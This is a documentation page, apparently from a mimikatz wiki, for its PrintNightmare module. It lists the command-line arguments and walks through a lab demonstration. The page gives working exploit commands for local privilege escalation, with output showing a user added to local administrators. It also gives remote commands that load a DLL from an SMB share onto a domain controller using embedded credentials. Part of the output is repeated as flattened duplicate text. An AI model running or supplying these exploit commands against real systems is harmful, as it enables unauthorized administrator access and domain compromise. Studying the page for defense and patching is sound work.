printnightmare

misc::printnightmare can be used to exploit the vulnerability in both [] and []. The bug was discovered by Zhiniang Peng () & Xuefeng Li (). The MS-PAR function was discovered by . It has the following command line arguments:

/server: the target server or workstation to exploit
/x64 or /win64: the target server or workstation is 64 bit
/x86 or /win32: the target server or workstation is 32 bit
/library: the DLL to use during exploitation
/authuser: the username to use during exploitation
/authdomain: the active directory domain
/authpassword: the password of the user
/clean: clean-up the operation

The following example demonstrates local privilege escalation through printnightmare. As can be seen, the test user is not part of the local administrators group on the Win10.hacklab.local machine:

PS C:\Users\m3g9tr0n> net user

User accounts for \\WIN10

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
test                     vs2022                   WDAGUtilityAccount
The command completed successfully.

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.

After successful exploitation of printnightmare:

mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!

The test user is now part of the local administrators group:

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.

For remote exploitation, the following can be used:

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local

Previousngcsign Nextregedit

Last updated 3 years ago

PS C:\Users\m3g9tr0n> net user User accounts for \\WIN10 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest test vs2022 WDAGUtilityAccount The command completed successfully. PS C:\Users\m3g9tr0n> net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator hacklab\Domain Admins hacklab\m3g9tr0n vs2022 The command completed successfully.

mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll [ms-rprn/ncalrpc] local > RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64 | mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll > RpcAddPrinterDriverEx: OK! > RpcDeletePrinterDriverEx: OK!

PS C:\Users\m3g9tr0n> net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator hacklab\Domain Admins hacklab\m3g9tr0n test vs2022 The command completed successfully.